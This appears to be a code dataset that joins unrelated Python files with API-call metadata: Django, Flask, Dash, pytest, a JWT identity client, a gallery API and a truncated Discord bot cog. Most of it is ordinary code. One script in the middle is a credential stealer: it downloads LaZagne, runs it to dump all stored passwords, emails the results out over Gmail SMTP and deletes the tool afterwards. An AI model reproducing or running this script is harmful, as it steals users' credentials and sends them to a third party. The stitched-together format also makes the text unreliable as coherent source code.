| [((236, 294), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""payment"""', 'name': '"""token"""'}), "(model_name='payment', name='token')\n", (258, 294), False, 'from django.db import migrations, models\n'), ((442, 485), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (462, 485), False, 'from django.db import migrations, models\n'), ((610, 685), 'django.db.models.DecimalField', 'models.DecimalField', ([], {'blank': '(True)', 'decimal_places': '(1)', 'max_digits': '(10)', 'null': '(True)'}), '(blank=True, decimal_places=1, max_digits=10, null=True)\n', (629, 685), False, 'from django.db import migrations, models\n'), ((815, 870), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (831, 870), False, 'from django.db import migrations, models\n'), ((997, 1047), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (1017, 1047), False, 'from django.db import migrations, models\n'), ((1178, 1319), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')\n ]", 'default': '"""USD"""', 'max_length': '(10)'}), "(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), (\n 'LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10)\n", (1194, 1319), False, 'from django.db import migrations, models\n'), ((1447, 1588), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')\n ]", 'default': '"""BTC"""', 'max_length': '(10)'}), "(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), (\n 'LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10)\n", (1463, 1588), False, 'from django.db import migrations, models\n'), ((1706, 2031), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), (\n 'confirming', 'Awaiting blockchain network confirmation'), ('paid',\n 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), (\n 'canceled', 'Canceled'), ('refunded', 'Refunded')]", 'default': '"""new"""', 'max_length': '(10)'}), "(choices=[('new', 'Newly created invoice'), ('pending',\n 'Awaiting payment'), ('confirming',\n 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), (\n 'invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'\n ), ('refunded', 'Refunded')], default='new', max_length=10)\n", (1722, 2031), False, 'from django.db import migrations, models\n')] |
import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
db = SQLAlchemy(app)
@app.before_first_request
def create_table():
db.create_all()
from space_trace import views, cli
| [
"flask_sqlalchemy.SQLAlchemy",
"flask.Flask"
]
| [((84, 130), 'flask.Flask', 'Flask', (['__name__'], {'instance_relative_config': '(True)'}), '(__name__, instance_relative_config=True)\n', (89, 130), False, 'from flask import Flask\n'), ((188, 203), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (198, 203), False, 'from flask_sqlalchemy import SQLAlchemy\n')] |
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Textarea(
id='textarea-example',
value='Textarea content initialized\nwith multiple lines of text',
style={'width': '100%', 'height': 300},
),
html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])
@app.callback(
Output('textarea-example-output', 'children'),
[Input('textarea-example', 'value')]
)
def update_output(value):
return 'You have entered: \n{}'.format(value)
if __name__ == '__main__':
app.run_server(debug=True)
| [
"dash.dependencies.Output",
"dash_core_components.Textarea",
"dash.dependencies.Input",
"dash.Dash",
"dash_html_components.Div"
]
| [((134, 153), 'dash.Dash', 'dash.Dash', (['__name__'], {}), '(__name__)\n', (143, 153), False, 'import dash\n'), ((458, 503), 'dash.dependencies.Output', 'Output', (['"""textarea-example-output"""', '"""children"""'], {}), "('textarea-example-output', 'children')\n", (464, 503), False, 'from dash.dependencies import Input, Output\n'), ((183, 338), 'dash_core_components.Textarea', 'dcc.Textarea', ([], {'id': '"""textarea-example"""', 'value': '"""Textarea content initialized\nwith multiple lines of text"""', 'style': "{'width': '100%', 'height': 300}"}), '(id=\'textarea-example\', value=\n """Textarea content initialized\nwith multiple lines of text""", style={\n \'width\': \'100%\', \'height\': 300})\n', (195, 338), True, 'import dash_core_components as dcc\n'), ((362, 434), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""textarea-example-output"""', 'style': "{'whiteSpace': 'pre-line'}"}), "(id='textarea-example-output', style={'whiteSpace': 'pre-line'})\n", (370, 434), True, 'import dash_html_components as html\n'), ((510, 544), 'dash.dependencies.Input', 'Input', (['"""textarea-example"""', '"""value"""'], {}), "('textarea-example', 'value')\n", (515, 544), False, 'from dash.dependencies import Input, Output\n')] |
import pytest
from selenium.common.exceptions import WebDriverException
from wrapped_driver import WrappedDriver
def test_empty_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(WebDriverException):
WrappedDriver(executable_path="", headless=True)
def test_no_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(TypeError):
WrappedDriver(headless=True)
| [
"pytest.raises",
"wrapped_driver.WrappedDriver"
]
| [((226, 259), 'pytest.raises', 'pytest.raises', (['WebDriverException'], {}), '(WebDriverException)\n', (239, 259), False, 'import pytest\n'), ((269, 317), 'wrapped_driver.WrappedDriver', 'WrappedDriver', ([], {'executable_path': '""""""', 'headless': '(True)'}), "(executable_path='', headless=True)\n", (282, 317), False, 'from wrapped_driver import WrappedDriver\n'), ((427, 451), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (440, 451), False, 'import pytest\n'), ((461, 489), 'wrapped_driver.WrappedDriver', 'WrappedDriver', ([], {'headless': '(True)'}), '(headless=True)\n', (474, 489), False, 'from wrapped_driver import WrappedDriver\n')] |
"""
transforms.py is for shape-preserving functions.
"""
import numpy as np
def shift(values: np.ndarray, periods: int, axis: int, fill_value) -> np.ndarray:
new_values = values
if periods == 0 or values.size == 0:
return new_values.copy()
# make sure array sent to np.roll is c_contiguous
f_ordered = values.flags.f_contiguous
if f_ordered:
new_values = new_values.T
axis = new_values.ndim - axis - 1
if new_values.size:
new_values = np.roll(
new_values,
np.intp(periods),
axis=axis,
)
axis_indexer = [slice(None)] * values.ndim
if periods > 0:
axis_indexer[axis] = slice(None, periods)
else:
axis_indexer[axis] = slice(periods, None)
new_values[tuple(axis_indexer)] = fill_value
# restore original order
if f_ordered:
new_values = new_values.T
return new_values
| [
"numpy.intp"
]
| [((564, 580), 'numpy.intp', 'np.intp', (['periods'], {}), '(periods)\n', (571, 580), True, 'import numpy as np\n')] |
from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
class IdentityClientMixin(metaclass=ABCMeta):
__publicKey = None
@property
@abstractmethod
def vendor_session_request(self) -> requests.Session:
pass
@property
@abstractmethod
def should_refresh_vendor_token(self) -> bool:
pass
@abstractmethod
def refresh_vendor_token(self) -> None:
pass
def get_public_key(self) -> str:
if self.__publicKey:
return self.__publicKey
logger.info('could not find public key locally, will fetch public key')
reties = 0
while reties < 10:
try:
self.__publicKey = self.fetch_public_key()
return self.__publicKey
except Exception as e:
reties = reties + 1
logger.error(
'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e))
logger.error('failed to get public key in all retries')
def fetch_public_key(self) -> str:
if self.should_refresh_vendor_token:
self.refresh_vendor_token()
response = self.vendor_session_request.get(
frontegg_urls.identity_service['vendor_config'])
response.raise_for_status()
data = response.json()
return data.get('publicKey')
def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True):
if not authorization_header:
raise InvalidTokenError('Authorization headers is missing')
logger.debug('found authorization header: ' +
str(authorization_header))
jwt_token = authorization_header.replace('Bearer ', '')
if verify:
public_key = self.get_public_key()
logger.debug('got public key' + str(public_key))
decoded = jwt.decode(jwt_token, public_key, algorithms='RS256')
else:
decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False)
logger.info('jwt was decoded successfully')
logger.debug('JWT value - ' + str(decoded))
return decoded
| [
"jwt.decode",
"frontegg.helpers.logger.logger.info",
"jwt.InvalidTokenError",
"frontegg.helpers.logger.logger.error"
]
| [((681, 752), 'frontegg.helpers.logger.logger.info', 'logger.info', (['"""could not find public key locally, will fetch public key"""'], {}), "('could not find public key locally, will fetch public key')\n", (692, 752), False, 'from frontegg.helpers.logger import logger\n'), ((1134, 1189), 'frontegg.helpers.logger.logger.error', 'logger.error', (['"""failed to get public key in all retries"""'], {}), "('failed to get public key in all retries')\n", (1146, 1189), False, 'from frontegg.helpers.logger import logger\n'), ((2200, 2243), 'frontegg.helpers.logger.logger.info', 'logger.info', (['"""jwt was decoded successfully"""'], {}), "('jwt was decoded successfully')\n", (2211, 2243), False, 'from frontegg.helpers.logger import logger\n'), ((1676, 1729), 'jwt.InvalidTokenError', 'InvalidTokenError', (['"""Authorization headers is missing"""'], {}), "('Authorization headers is missing')\n", (1693, 1729), False, 'from jwt import InvalidTokenError\n'), ((2045, 2098), 'jwt.decode', 'jwt.decode', (['jwt_token', 'public_key'], {'algorithms': '"""RS256"""'}), "(jwt_token, public_key, algorithms='RS256')\n", (2055, 2098), False, 'import jwt\n'), ((2135, 2190), 'jwt.decode', 'jwt.decode', (['jwt_token'], {'algorithms': '"""RS256"""', 'verify': '(False)'}), "(jwt_token, algorithms='RS256', verify=False)\n", (2145, 2190), False, 'import jwt\n')] |
#!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as f:
f.write(get_response.content)
def send_mail(email, password, message):
server = smtplib.SMTP_SSL("smtp.gmail.com", "465")
server.ehlo()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("<EMAIL>", "yourpassword", result)
os.remove("lazagne.exe")
| [
"subprocess.check_output",
"smtplib.SMTP_SSL",
"requests.get",
"os.chdir",
"tempfile.gettempdir",
"os.remove"
]
| [((500, 521), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (519, 521), False, 'import tempfile\n'), ((522, 540), 'os.chdir', 'os.chdir', (['temp_dir'], {}), '(temp_dir)\n', (530, 540), False, 'import os\n'), ((649, 703), 'subprocess.check_output', 'subprocess.check_output', (['"""lazagne.exe all"""'], {'shell': '(True)'}), "('lazagne.exe all', shell=True)\n", (672, 703), False, 'import subprocess\n'), ((749, 773), 'os.remove', 'os.remove', (['"""lazagne.exe"""'], {}), "('lazagne.exe')\n", (758, 773), False, 'import os\n'), ((148, 165), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (160, 165), False, 'import requests\n'), ((332, 373), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', (['"""smtp.gmail.com"""', '"""465"""'], {}), "('smtp.gmail.com', '465')\n", (348, 373), False, 'import smtplib\n')] |
from SmartAPI.rdf.List import List
class LinkedList(List):
def __init__(self):
List.__init__(self)
| [
"SmartAPI.rdf.List.List.__init__"
]
| [((93, 112), 'SmartAPI.rdf.List.List.__init__', 'List.__init__', (['self'], {}), '(self)\n', (106, 112), False, 'from SmartAPI.rdf.List import List\n')] |
##################################################################################################
# Copyright (c) 2012 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################
"""
Gallery API
::
GET / Lists the galleries currently visible by the current user
POST / Creates a gallery object
GET /id Gallery object if visible by the current user
PUT /id Adds image or video objects to the gallery
DELETE /id Removes image or video objects from the gallery
GET /filter Returns a filtered list of image and video objects
"""
import time
import functools
import logging
import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json
try:
from haystack.query import SearchQuerySet
HAYSTACK = True
except (ImportError, ImproperlyConfigured):
HAYSTACK = False
from frog.models import (
Gallery,
Image,
Video,
Group,
GallerySubscription,
SiteConfig,
Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP
LOGGER = logging.getLogger("frog")
try:
QUERY_MODELS = [
_
for _ in ContentType.objects.filter(app_label="frog")
if issubclass(_.model_class(), Piece)
]
except ProgrammingError:
pass
BATCH_LENGTH = 75
def index(request, obj_id=None):
"""Handles a request based on method and calls the appropriate function"""
if request.method == "GET":
return get(request, obj_id)
elif request.method == "POST":
return post(request)
elif request.method == "PUT":
return put(request, obj_id)
elif request.method == "DELETE":
return delete(request, obj_id)
def get(request, obj_id=None):
if obj_id:
obj = Gallery.objects.get(pk=obj_id)
if obj.security != Gallery.PUBLIC and request.user.is_anonymous:
raise PermissionDenied
else:
res = Result()
personal = []
clearance = Gallery.PUBLIC
if request.user.is_authenticated:
personal = Gallery.objects.filter(
security=Gallery.PERSONAL, owner=request.user
)
try:
clearance = request.user.frog_prefs.first().clearance
except AttributeError:
clearance = Gallery.PUBLIC
# Staff members should see everything
if request.user.is_staff:
clearance = Gallery.GUARDED
objects = Gallery.objects.filter(security__lte=clearance)
ids = []
for gallery in objects:
if gallery.security == Gallery.PERSONAL:
continue
if gallery.id in ids:
continue
ids.append(gallery.id)
res.append(gallery.json())
for gallery in personal:
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def post(request):
""" Create a Gallery """
defaultname = "New Gallery %i" % Gallery.objects.all().count()
data = json.loads(request.body)["body"]
title = data.get("title", defaultname)
description = data.get("description", "")
security = int(
data.get("security", request.user.frog_prefs.first().clearance)
)
g, created = Gallery.objects.get_or_create(title=title)
g.security = security
g.description = description
g.owner = request.user
g.save()
res = Result()
res.append(g.json())
res.message = "Gallery created" if created else ""
return JsonResponse(res.asDict())
@login_required
def put(request, obj_id=None):
""" Adds Image and Video objects to Gallery based on GUIDs """
data = json.loads(request.body)["body"]
guids = data.get("guids", "").split(",")
move = data.get("from")
security = data.get("security")
gallery = Gallery.objects.get(pk=obj_id)
# Set the security first so subsequent securityChecks will get the correct security level
if security is not None:
gallery.security = json.loads(security)
gallery.save()
for child in gallery.gallery_set.all():
child.security = gallery.security
child.save()
if guids:
items = getObjectsFromGuids(guids)
gallery.addItems(items)
if move:
fromgallery = Gallery.objects.get(pk=move)
fromgallery.removeItems(items)
res = Result()
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def delete(request, obj_id=None):
""" Removes ImageVideo objects from Gallery """
data = json.loads(request.body)
guids = data.get("guids").split(",")
items = getObjectsFromGuids(guids)
gallery = Gallery.objects.get(pk=obj_id)
LOGGER.info(
"{} removed {} from {}".format(request.user.email, guids, gallery)
)
gallery.removeItems(items)
res = Result()
return JsonResponse(res.asDict())
@login_required
def filterObjects(request, obj_id):
"""
Filters Gallery for the requested ImageVideo objects. Returns a Result object with
serialized objects
"""
if int(obj_id) == 0:
obj = None
else:
obj = Gallery.objects.get(pk=obj_id)
isanonymous = request.user.is_anonymous
if isanonymous and obj is None:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if isanonymous and obj and obj.security != Gallery.PUBLIC:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if obj and obj.security != Gallery.PERSONAL:
if request.user.frog_prefs.first().clearance < obj.security:
raise PermissionDenied()
tags = json.loads(request.GET.get("filters", "[[]]"))
more = json.loads(request.GET.get("more", "false"))
orderby = request.GET.get(
"orderby", request.user.frog_prefs.get().json()["orderby"]
)
tags = [t for t in tags if t]
return _filter(request, obj, tags=tags, more=more, orderby=orderby)
def _filter(request, object_, tags=None, more=False, orderby="created"):
"""Filters Piece objects from self based on filters, search, and range
:param tags: List of tag IDs to filter
:type tags: list
:param more -- bool, Returns more of the same filtered set of images based on session range
return list, Objects filtered
"""
res = Result()
idDict = {}
objDict = {}
data = {}
modelmap = {}
# Get all IDs for each model
for m in QUERY_MODELS:
modelmap[m.model_class()] = m.model
if object_:
idDict[m.model] = m.model_class().objects.filter(gallery=object_)
else:
idDict[m.model] = m.model_class().objects.all()
if idDict[m.model] is None:
continue
if tags:
for bucket in tags:
searchQuery = ""
o = None
for item in bucket:
if item == 0:
# filter by tagless
idDict[m.model].annotate(num_tags=Count("tags"))
if not o:
o = Q()
o |= Q(num_tags__lte=1)
break
elif isinstance(item, six.integer_types):
# filter by tag
if not o:
o = Q()
o |= Q(tags__id=item)
else:
# add to search string
searchQuery += item + " "
if not HAYSTACK:
if not o:
o = Q()
# use a basic search
o |= Q(title__icontains=item)
if HAYSTACK and searchQuery != "":
# once all tags have been filtered, filter by search
searchIDs = search(searchQuery, m.model_class())
if searchIDs:
if not o:
o = Q()
o |= Q(id__in=searchIDs)
if o:
# apply the filters
idDict[m.model] = (
idDict[m.model]
.annotate(num_tags=Count("tags"))
.filter(o)
)
else:
idDict[m.model] = idDict[m.model].none()
# Remove hidden items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(hidden=True)
# Remove deleted items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(deleted=True)
# Get all ids of filtered objects, this will be a very fast query
idDict[m.model] = list(
idDict[m.model]
.order_by("-{}".format(orderby))
.values_list("id", flat=True)
)
lastid = request.session.get("last_{}".format(m.model), 0)
if not idDict[m.model]:
continue
if not more:
lastid = idDict[m.model][0]
try:
index = idDict[m.model].index(lastid)
except ValueError:
index = 0
if more and lastid != 0:
index += 1
idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]
# perform the main query to retrieve the objects we want
objDict[m.model] = m.model_class().objects.filter(
id__in=idDict[m.model]
)
objDict[m.model] = (
objDict[m.model]
.select_related("author")
.prefetch_related("tags")
.order_by("-{}".format(orderby))
)
objDict[m.model] = list(objDict[m.model])
# combine and sort all objects by date
objects = _sortObjects(orderby, **objDict)
objects = objects[:BATCH_LENGTH]
# Find out last ids
lastids = {}
for obj in objects:
lastids["last_{}".format(modelmap[obj.__class__])] = obj.id
for key, value in lastids.items():
request.session[key] = value
# serialize objects
for i in objects:
res.append(i.json())
data["count"] = len(objects)
if settings.DEBUG:
data["queries"] = connection.queries
res.value = data
return JsonResponse(res.asDict())
def _sortObjects(orderby="created", **kwargs):
"""Sorts lists of objects and combines them into a single list"""
o = []
for m in kwargs.values():
for l in iter(m):
o.append(l)
o = list(set(o))
sortfunc = _sortByCreated if orderby == "created" else _sortByModified
if six.PY2:
o.sort(sortfunc)
else:
o.sort(key=functools.cmp_to_key(sortfunc))
return o
def _sortByCreated(a, b):
"""Sort function for object by created date"""
if a.created < b.created:
return 1
elif a.created > b.created:
return -1
else:
return 0
def _sortByModified(a, b):
"""Sort function for object by modified date"""
if a.modified < b.modified:
return 1
elif a.modified > b.modified:
return -1
else:
return 0
def search(query, model):
""" Performs a search query and returns the object ids """
query = query.strip()
LOGGER.debug(query)
sqs = SearchQuerySet()
results = sqs.raw_search("{}*".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}*".format(query)).models(model)
return [o.pk for o in results]
@require_POST
@login_required
def subscribe(request, obj_id):
gallery = Gallery.objects.get(pk=obj_id)
data = json.loads(request.body)["body"]
frequency = data.get("frequency", GallerySubscription.WEEKLY)
sub, created = GallerySubscription.objects.get_or_create(
gallery=gallery, user=request.user, frequency=frequency
)
if not created:
# it already existed so delete it
sub.delete()
return JsonResponse(Result().asDict())
| [
"logging.getLogger",
"haystack.query.SearchQuerySet",
"frog.models.Gallery.objects.get",
"json.loads",
"frog.models.GallerySubscription.objects.get_or_create",
"django.core.exceptions.PermissionDenied",
"django.contrib.contenttypes.models.ContentType.objects.filter",
"functools.cmp_to_key",
"django.db.models.Count",
"frog.models.Gallery.objects.filter",
"frog.common.getClientIP",
"frog.models.Gallery.objects.get_or_create",
"frog.models.Gallery.objects.all",
"django.db.models.Q",
"frog.common.Result",
"frog.common.getObjectsFromGuids"
]
| [((2656, 2681), 'logging.getLogger', 'logging.getLogger', (['"""frog"""'], {}), "('frog')\n", (2673, 2681), False, 'import logging\n'), ((4847, 4889), 'frog.models.Gallery.objects.get_or_create', 'Gallery.objects.get_or_create', ([], {'title': 'title'}), '(title=title)\n', (4876, 4889), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((4999, 5007), 'frog.common.Result', 'Result', ([], {}), '()\n', (5005, 5007), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((5410, 5440), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (5429, 5440), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((5972, 5980), 'frog.common.Result', 'Result', ([], {}), '()\n', (5978, 5980), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((6166, 6190), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (6176, 6190), False, 'import json\n'), ((6244, 6270), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', (['guids'], {}), '(guids)\n', (6263, 6270), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((6285, 6315), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (6304, 6315), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((6458, 6466), 'frog.common.Result', 'Result', ([], {}), '()\n', (6464, 6466), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((8173, 8181), 'frog.common.Result', 'Result', ([], {}), '()\n', (8179, 8181), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((13195, 13211), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13209, 13211), False, 'from haystack.query import SearchQuerySet\n'), ((13567, 13597), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (13586, 13597), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((13728, 13831), 'frog.models.GallerySubscription.objects.get_or_create', 'GallerySubscription.objects.get_or_create', ([], {'gallery': 'gallery', 'user': 'request.user', 'frequency': 'frequency'}), '(gallery=gallery, user=request.\n user, frequency=frequency)\n', (13769, 13831), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((3338, 3368), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (3357, 3368), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((3501, 3509), 'frog.common.Result', 'Result', ([], {}), '()\n', (3507, 3509), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((4039, 4086), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', ([], {'security__lte': 'clearance'}), '(security__lte=clearance)\n', (4061, 4086), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((4609, 4633), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (4619, 4633), False, 'import json\n'), ((5254, 5278), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (5264, 5278), False, 'import json\n'), ((5592, 5612), 'json.loads', 'json.loads', (['security'], {}), '(security)\n', (5602, 5612), False, 'import json\n'), ((5786, 5812), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', (['guids'], {}), '(guids)\n', (5805, 5812), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((6755, 6785), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (6774, 6785), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((7046, 7064), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (7062, 7064), False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((7307, 7325), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (7323, 7325), False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((13609, 13633), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (13619, 13633), False, 'import json\n'), ((2735, 2779), 'django.contrib.contenttypes.models.ContentType.objects.filter', 'ContentType.objects.filter', ([], {'app_label': '"""frog"""'}), "(app_label='frog')\n", (2761, 2779), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((3634, 3703), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', ([], {'security': 'Gallery.PERSONAL', 'owner': 'request.user'}), '(security=Gallery.PERSONAL, owner=request.user)\n', (3656, 3703), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((5889, 5917), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'move'}), '(pk=move)\n', (5908, 5917), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((7463, 7481), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (7479, 7481), False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((4568, 4589), 'frog.models.Gallery.objects.all', 'Gallery.objects.all', ([], {}), '()\n', (4587, 4589), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((6982, 7002), 'frog.common.getClientIP', 'getClientIP', (['request'], {}), '(request)\n', (6993, 7002), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((7243, 7263), 'frog.common.getClientIP', 'getClientIP', (['request'], {}), '(request)\n', (7254, 7263), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((12586, 12616), 'functools.cmp_to_key', 'functools.cmp_to_key', (['sortfunc'], {}), '(sortfunc)\n', (12606, 12616), False, 'import functools\n'), ((13950, 13958), 'frog.common.Result', 'Result', ([], {}), '()\n', (13956, 13958), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((8978, 8996), 'django.db.models.Q', 'Q', ([], {'num_tags__lte': '(1)'}), '(num_tags__lte=1)\n', (8979, 8996), False, 'from django.db.models import Q, Count\n'), ((9921, 9940), 'django.db.models.Q', 'Q', ([], {'id__in': 'searchIDs'}), '(id__in=searchIDs)\n', (9922, 9940), False, 'from django.db.models import Q, Count\n'), ((8945, 8948), 'django.db.models.Q', 'Q', ([], {}), '()\n', (8946, 8948), False, 'from django.db.models import Q, Count\n'), ((9228, 9244), 'django.db.models.Q', 'Q', ([], {'tags__id': 'item'}), '(tags__id=item)\n', (9229, 9244), False, 'from django.db.models import Q, Count\n'), ((9888, 9891), 'django.db.models.Q', 'Q', ([], {}), '()\n', (9889, 9891), False, 'from django.db.models import Q, Count\n'), ((8864, 8877), 'django.db.models.Count', 'Count', (['"""tags"""'], {}), "('tags')\n", (8869, 8877), False, 'from django.db.models import Q, Count\n'), ((9195, 9198), 'django.db.models.Q', 'Q', ([], {}), '()\n', (9196, 9198), False, 'from django.db.models import Q, Count\n'), ((9569, 9593), 'django.db.models.Q', 'Q', ([], {'title__icontains': 'item'}), '(title__icontains=item)\n', (9570, 9593), False, 'from django.db.models import Q, Count\n'), ((9483, 9486), 'django.db.models.Q', 'Q', ([], {}), '()\n', (9484, 9486), False, 'from django.db.models import Q, Count\n'), ((10127, 10140), 'django.db.models.Count', 'Count', (['"""tags"""'], {}), "('tags')\n", (10132, 10140), False, 'from django.db.models import Q, Count\n')] |
# from redbot.core import Config
from redbot.core import Config, commands, checks
import asyncio
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
import re
class Spotifyembed(commands.Cog):
